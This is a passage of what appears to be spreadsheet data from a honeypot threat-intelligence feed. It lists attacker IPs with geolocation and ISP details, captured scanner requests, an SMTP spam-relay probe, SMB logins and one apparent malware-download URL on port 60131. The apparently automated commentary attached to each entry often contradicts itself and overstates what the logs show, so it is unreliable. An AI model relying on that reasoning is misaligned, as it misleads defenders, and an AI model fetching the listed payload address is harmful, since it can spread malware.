    <t>SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>71</t>
  </si>
  <si>
    <t>Cherkasy</t>
  </si>
  <si>
    <t>Cherkasy Raion</t>
  </si>
  <si>
    <t>710791</t>
  </si>
  <si>
    <t>49.4413</t>
  </si>
  <si>
    <t>32.0643</t>
  </si>
  <si>
    <t>25133</t>
  </si>
  <si>
    <t>LLC McLaut-Invest</t>
  </si>
  <si>
    <t>broadband</t>
  </si>
  <si>
    <t>::ffff:4e89:514</t>
  </si>
  <si>
    <t>c7555a44e3e689daa20ca7858217d123</t>
  </si>
  <si>
    <t>59.182.186.31</t>
  </si>
  <si>
    <t>Chennai</t>
  </si>
  <si>
    <t>1264527</t>
  </si>
  <si>
    <t>600001</t>
  </si>
  <si>
    <t>13.0827</t>
  </si>
  <si>
    <t>80.2707</t>
  </si>
  <si>
    <t>::ffff:3bb6:ba1f</t>
  </si>
  <si>
    <t>There is no data available for the Telnet service, indicating it has not been used or accessed recently.
This lack of activity might be due to the service being disabled or not being monitored properly.
The absence of data could also mean that the service is secure and hasn't been targeted by malicious actors. &amp;&amp; No TELNET activity detected, indicating potential scanning or probing attempts for vulnerable ports.
TELNET is an outdated protocol often exploited by malicious actors for unauthorized access.
This suggests possible reconnaissance efforts to identify vulnerabilities on the system.</t>
  </si>
  <si>
    <t>154e16d5c25995be6d76f70dfc997851</t>
  </si>
  <si>
    <t>78.100.221.144</t>
  </si>
  <si>
    <t>QA</t>
  </si>
  <si>
    <t>Qatar</t>
  </si>
  <si>
    <t>DA</t>
  </si>
  <si>
    <t>Baladīyat ad Dawḩah</t>
  </si>
  <si>
    <t>Doha</t>
  </si>
  <si>
    <t>290030</t>
  </si>
  <si>
    <t>25.2854</t>
  </si>
  <si>
    <t>51.531</t>
  </si>
  <si>
    <t>8781</t>
  </si>
  <si>
    <t>QA-ISP</t>
  </si>
  <si>
    <t>Ooredoo-Broadband</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0}</t>
  </si>
  <si>
    <t>::ffff:4e64:dd90</t>
  </si>
  <si>
    <t>a427cd2f19e4985b3300c1f4df68e094</t>
  </si>
  <si>
    <t>94.102.56.99</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTPS_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;389&amp;&amp;80&amp;&amp;22&amp;&amp;389&amp;&amp;443&amp;&amp;445&amp;&amp;631&amp;&amp;5900&amp;&amp;1080&amp;&amp;80&amp;&amp;21729&amp;&amp;23&amp;&amp;46259&amp;&amp;1080&amp;&amp;11584&amp;&amp;8443&amp;&amp;54576&amp;&amp;NA&amp;&amp;57898&amp;&amp;36613&amp;&amp;36914&amp;&amp;55580&amp;&amp;33945&amp;&amp;50695&amp;&amp;47971&amp;&amp;57415&amp;&amp;36115&amp;&amp;42289&amp;&amp;35199&amp;&amp;59302&amp;&amp;33219&amp;&amp;51767&amp;&amp;46215</t>
  </si>
  <si>
    <t>2008-08-29</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:5e66:3863</t>
  </si>
  <si>
    <t>Possible malicious activity: A request was made to a server with an unusual host IP address, possibly attempting to scan or probe the system. The User-Agent header is set to a suspicious value that may indicate automated scanning software. This could be part of a larger reconnaissance effort. &amp;&amp; This data indicates a potential scan of the target's HTTPS service, possibly searching for vulnerabilities or exposed services with the User-Agent identifying as a custom tool and the Accept-Encoding header suggesting support for compression which could be used for evasion. The IP address 38.54.115.66 is attempting to access the root directory '/' via an HTTP GET request. &amp;&amp; The data indicates that there was an attempt to connect to an LDAP service, but it is unknown if the connection was successful. The lack of further information suggests a failed or incomplete connection attempt. This could be a reconnaissance or attack in progress. &amp;&amp; No FTP activity detected, potentially indicating no malicious login attempts via this service. This could be due to no connections or the honeypot being inactive for FTP. A possible explanation is that the threat actor didn't target FTP or wasn't interested in using it. &amp;&amp; No FTP data available, possibly indicating normal or legitimate service usage. No notable malicious activity detected through FTP connection attempts. Normal operation without any suspicious FTP activity. &amp;&amp; A request was made to a server from an unknown host with a generic User-Agent header, indicating potential automated activity. The request is for the root directory of the site and includes support for gzip compression, which can help hide malicious data.</t>
  </si>
  <si>
    <t>09cf95aa985bb7f7068038b09b493a50</t>
  </si>
  <si>
    <t>103.140.2.11</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>Firozpur</t>
  </si>
  <si>
    <t>Abohar (Nai Abadi)</t>
  </si>
  <si>
    <t>1279403</t>
  </si>
  <si>
    <t>152116</t>
  </si>
  <si>
    <t>30.1326</t>
  </si>
  <si>
    <t>74.1897</t>
  </si>
  <si>
    <t>137655</t>
  </si>
  <si>
    <t>Angel Air Network Solutions Pvt. Ltd.</t>
  </si>
  <si>
    <t>Angel Air Network Solutions Pvt. Ltd</t>
  </si>
  <si>
    <t>::ffff:678c:20b</t>
  </si>
  <si>
    <t>6adbe38783b1f981ac1bc7731fac9909</t>
  </si>
  <si>
    <t>117.251.175.3</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>26650&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75fb:af03</t>
  </si>
  <si>
    <t>No activity detected, unknown or invalid connection attempt to TELNET service. 
TELNET service appears to be idle with no incoming connections.
No suspicious behavior observed for this service at this time. &amp;&amp; No connection attempt was made over Telnet service, indicating potential probing or scanning activity. 
This could be an attacker trying to identify available services on the system.
The lack of a connection attempt suggests a reconnaissance step in a larger attack.</t>
  </si>
  <si>
    <t>251d32791ddeda55e187b17178c3a2f0</t>
  </si>
  <si>
    <t>89.148.42.106</t>
  </si>
  <si>
    <t>BH</t>
  </si>
  <si>
    <t>Bahrain</t>
  </si>
  <si>
    <t>Manama</t>
  </si>
  <si>
    <t>290340</t>
  </si>
  <si>
    <t>26.2279</t>
  </si>
  <si>
    <t>50.5857</t>
  </si>
  <si>
    <t>5416</t>
  </si>
  <si>
    <t>UNSPECIFIED</t>
  </si>
  <si>
    <t>Bahrain Telecommunication Company</t>
  </si>
  <si>
    <t>::ffff:5994:2a6a</t>
  </si>
  <si>
    <t>A user attempted to log in via HTTP using a fake or stolen identity, likely trying to gain unauthorized access to an account or system, possibly from a Windows 10 machine with Chrome browser. The user agent string suggests a realistic attempt to mimic legitimate traffic. This could be part of a larger attack to compromise sensitive information. &amp;&amp; An unknown user is attempting to log in via HTTP using a browser string that suggests it's likely a fake or automated login attempt from a Windows system with suspicious browser version. 
The browser claims to be Google Chrome but has a highly exaggerated and unrealistic version number which may indicate spoofing.
This could be an indication of a botnet or script trying to gain unauthorized access.</t>
  </si>
  <si>
    <t>70f5fcbbcf31d2a683356f13769eb85e</t>
  </si>
  <si>
    <t>213.209.150.85</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>64105&amp;&amp;25&amp;&amp;NA</t>
  </si>
  <si>
    <t>2000-06-07</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 1 Mar 2025 11:37:07 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '5.182.38.84_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 1 Mar 2025 23:53:17 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 6 Mar 2025 14:11:18 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:d5d1:9655</t>
  </si>
  <si>
    <t>No activity detected via SMTP service, possibly indicating a failed or unauthorized attempt to send emails. No incoming or outgoing email attempts were made from this source during the monitoring period. This suggests potential malicious intent was blocked. &amp;&amp; This log entry suggests an attempt to reset a connection to a mail server, possibly indicating a scanning or probing activity for vulnerabilities. It may be part of a reconnaissance phase before launching a more targeted attack. The attacker is likely verifying if the target can be exploited for email-based malicious activities.</t>
  </si>
  <si>
    <t>Brute Force &amp;&amp; SPAM ATTACK</t>
  </si>
  <si>
    <t>34a864f160b0ebe2ecff048e1948a97b</t>
  </si>
  <si>
    <t>117.206.137.211</t>
  </si>
  <si>
    <t>::ffff:75ce:89d3</t>
  </si>
  <si>
    <t>No activity was detected via Telnet service but this could be an indication that no users attempted to connect or login through this specific port which may raise suspicion of potential malicious activities targeting other services. The lack of activity on the Telnet service might indicate an attacker avoiding detection by not using it. This could also mean a legitimate user never needed to use the service. &amp;&amp; No suspicious activity detected for telnet service, connection attempt or login unsuccessful. Data is unknown or not available. Service remains inactive at this point.</t>
  </si>
  <si>
    <t>24e332b807ff4d326dbcb35d83c1f41a</t>
  </si>
  <si>
    <t>58.72.124.213</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>445&amp;&amp;65473&amp;&amp;23</t>
  </si>
  <si>
    <t>Anyang-si</t>
  </si>
  <si>
    <t>Anyang-si (Deokcheon-ro)</t>
  </si>
  <si>
    <t>1846898</t>
  </si>
  <si>
    <t>14088</t>
  </si>
  <si>
    <t>37.3881</t>
  </si>
  <si>
    <t>126.936</t>
  </si>
  <si>
    <t>3786</t>
  </si>
  <si>
    <t>LG DACOM Corporation</t>
  </si>
  <si>
    <t>Boranet</t>
  </si>
  <si>
    <t>2005-03-16</t>
  </si>
  <si>
    <t>BORANET</t>
  </si>
  <si>
    <t>::ffff:3a48:7cd5</t>
  </si>
  <si>
    <t>54f81628488bff6c48bc3a7d2b70da43</t>
  </si>
  <si>
    <t>117.209.40.9</t>
  </si>
  <si>
    <t>::ffff:75d1:2809</t>
  </si>
  <si>
    <t>There is no log data for TELNET service, indicating either no activity or failed detection of malicious behavior related to this service. This lack of activity could be due to successful blocking or absence of attempts to exploit the TELNET service. &amp;&amp; Telnet service is being probed or scanned by an unknown entity with no apparent malicious intentions, but this could be a precursor to a more significant threat. The lack of activity on the Telnet service suggests that it may not be actively exploited at this moment. The data indicates potential reconnaissance.</t>
  </si>
  <si>
    <t>a623a119721b86f06efabc84c3b19769</t>
  </si>
  <si>
    <t>178.224.148.137</t>
  </si>
  <si>
    <t>50266</t>
  </si>
  <si>
    <t>Odido Netherlands B.V.</t>
  </si>
  <si>
    <t>Odido Netherlands</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Mobile Safari/537.36}</t>
  </si>
  <si>
    <t>::ffff:b2e0:9489</t>
  </si>
  <si>
    <t>A login attempt was made from an Android device with a suspicious browser signature, suggesting potential unauthorized access attempts. The browser version appears to be fabricated, indicating possible spoofing or fake identification. This may indicate a malicious actor trying to gain unauthorized access. &amp;&amp; Potential unauthorized access attempt from an Android device with user agent matching a common browser fingerprint. Possible brute force login or credential harvesting activity. Device is likely scanning for vulnerable services to exploit. &amp;&amp; A user is attempting to login via HTTP, likely using stolen credentials or brute forcing a legitimate account, utilizing an Android device and a custom browser configuration. The browser and device information is suspiciously vague, indicating potential tampering or spoofing. This activity suggests a malicious intent to gain unauthorized access. &amp;&amp; A possible brute-force attack is occurring as multiple HTTP login attempts are being made with the same user agent string from an Android device, indicating a potential automated login attempt from a malicious source. This could be part of a larger campaign to gain unauthorized access. The consistency in the user agent suggests a scripted approach.</t>
  </si>
  <si>
    <t>7a231047e267082a00091bd4734f4038</t>
  </si>
  <si>
    <t>180.219.64.169</t>
  </si>
  <si>
    <t>Smartone</t>
  </si>
  <si>
    <t>::ffff:b4db:40a9</t>
  </si>
  <si>
    <t>No connection was established via TELNET service, indicating it may be idle or not being used. No notable malicious activity detected from this data point. This could indicate the service is offline or not accessible. &amp;&amp; No data was received for the TELNET service, possibly indicating no connection attempt or an inactive port. This could be due to legitimate or malicious reasons, such as a firewall blocking incoming connections or an attacker not attempting to access the service. The lack of data does not necessarily indicate malicious activity.</t>
  </si>
  <si>
    <t>aec195ad94db41c65d977a78c49ae425</t>
  </si>
  <si>
    <t>202.83.16.51</t>
  </si>
  <si>
    <t>{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,50776)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,55502)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,59994)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,55517)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,56194)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,65420)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,49383)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,50745)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,51227)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,63663)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,64406)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,59690)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,60250)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,58100)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,58539)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,57255)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,57852)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,57427)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,59299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,50484)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,50907)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,57635)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,58221)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:ca53:1033</t>
  </si>
  <si>
    <t>5cf4b556fc0b110f79abdd757ea113e8</t>
  </si>
  <si>
    <t>42.98.34.202</t>
  </si>
  <si>
    <t>42-98-34-202.static.netvigator.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Central</t>
  </si>
  <si>
    <t>8223932</t>
  </si>
  <si>
    <t>22.2836</t>
  </si>
  <si>
    <t>114.16</t>
  </si>
  <si>
    <t>::ffff:2a62:22ca</t>
  </si>
  <si>
    <t>a2222eac66a6f841b0c83894c2ef139a</t>
  </si>
  <si>
    <t>103.93.121.6</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H29</t>
  </si>
  <si>
    <t>3306&amp;&amp;445&amp;&amp;1433</t>
  </si>
  <si>
    <t>Takalar Regency</t>
  </si>
  <si>
    <t>Takalar</t>
  </si>
  <si>
    <t>1625546</t>
  </si>
  <si>
    <t>-5.41625</t>
  </si>
  <si>
    <t>119.488</t>
  </si>
  <si>
    <t>150461</t>
  </si>
  <si>
    <t>PT Iftalink Media Karya</t>
  </si>
  <si>
    <t>2022-11-15</t>
  </si>
  <si>
    <t>IDNIC-IFTALINK-ID</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.93.121.6,64291)}&amp;&amp;{Data_SMB:Incoming connection (103.93.121.6,65001)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:675d:7906</t>
  </si>
  <si>
    <t>The data suggests that an attempt was made to access MySQL services without providing any credentials or making a valid connection, indicating possible brute-force login attempts or scanning for vulnerabilities. This could be an attempt to gain unauthorized access to databases by exploiting weaknesses in the system. The lack of valid credentials indicates the actor may not have been successful in logging into the database.</t>
  </si>
  <si>
    <t>eeb6d89b4c5c51d5ad94f39f9d12fe6e</t>
  </si>
  <si>
    <t>188.70.23.25</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>KW</t>
  </si>
  <si>
    <t>Kuwait</t>
  </si>
  <si>
    <t>FA</t>
  </si>
  <si>
    <t>Al Farwaniyah</t>
  </si>
  <si>
    <t>Al Farwānīyah</t>
  </si>
  <si>
    <t>285815</t>
  </si>
  <si>
    <t>29.2775</t>
  </si>
  <si>
    <t>47.9586</t>
  </si>
  <si>
    <t>29357</t>
  </si>
  <si>
    <t>WATANIYATELECOM-AS</t>
  </si>
  <si>
    <t>National Mobile Telecommunications Company</t>
  </si>
  <si>
    <t>Wataniya HSDPA Services</t>
  </si>
  <si>
    <t>::ffff:bc46:1719</t>
  </si>
  <si>
    <t>A possible brute force login attempt has been made from a Windows system using Google Chrome browser. The attacker's IP address is hidden behind a fake user agent string. This activity suggests an attempted unauthorized access to a web application or server. &amp;&amp; An attempt to login to a service using a fake browser and operating system combination is detected. The activity suggests an automated or scripted attack aiming to bypass authentication mechanisms. Multiple browsers and OS versions are being tested simultaneously.</t>
  </si>
  <si>
    <t>486c6517ef7633bf1237a1cde50a26be</t>
  </si>
  <si>
    <t>117.194.69.253</t>
  </si>
  <si>
    <t>::ffff:75c2:45fd</t>
  </si>
  <si>
    <t>No malicious activity was detected via TELNET service as there's no incoming traffic or connection attempt recorded. The "NA" indicates unknown, absent, or null status. This could be due to the absence of any TELNET-related events within the monitoring period. &amp;&amp; No activity detected for Telnet service, indicating potential scan or reconnaissance attempt by malicious actors to identify vulnerable services on the network. This could be an initial probing to gain access to other services later. The lack of traffic might also indicate a stealthy scanning technique used by some attackers.</t>
  </si>
  <si>
    <t>d2930ea6b58c198c930c6f998b4fb4a8</t>
  </si>
  <si>
    <t>47.76.211.88</t>
  </si>
  <si>
    <t>http://47.76.211.88:60131/linux</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_DNS_H28&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_REDIS_H4</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;53&amp;&amp;30580&amp;&amp;NA</t>
  </si>
  <si>
    <t>2016-03-17</t>
  </si>
  <si>
    <t>AL-3</t>
  </si>
  <si>
    <t>2017-04-26</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}</t>
  </si>
  <si>
    <t>::ffff:2f4c:d358</t>
  </si>
  <si>
    <t>a73f7ef9c52f574d6917dbfa5bcb1956</t>
  </si>
  <si>
    <t>103.172.79.37</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;abuseipdb</t>
  </si>
  <si>
    <t>5900&amp;&amp;NA</t>
  </si>
  <si>
    <t>Quận Sáu</t>
  </si>
  <si>
    <t>9645072</t>
  </si>
  <si>
    <t>10.7398</t>
  </si>
  <si>
    <t>106.641</t>
  </si>
  <si>
    <t>135901</t>
  </si>
  <si>
    <t>Phuong Dong technology solution company limited</t>
  </si>
  <si>
    <t>HIGHTECHK</t>
  </si>
  <si>
    <t>High Tech K Software Services Company Limited</t>
  </si>
  <si>
    <t>2021-08-25</t>
  </si>
  <si>
    <t>HIGHTECHK-VN</t>
  </si>
  <si>
    <t>::ffff:67ac:4f25</t>
  </si>
  <si>
    <t>No data provided, so there's nothing to analyze or explain. &amp;&amp; Insufficient log data provided for analysis.</t>
  </si>
  <si>
    <t>a160b74429e1b44f34d8af8acadf798a</t>
  </si>
  <si>
    <t>59.183.116.229</t>
  </si>
  <si>
    <t>::ffff:3bb7:74e5</t>
  </si>
  <si>
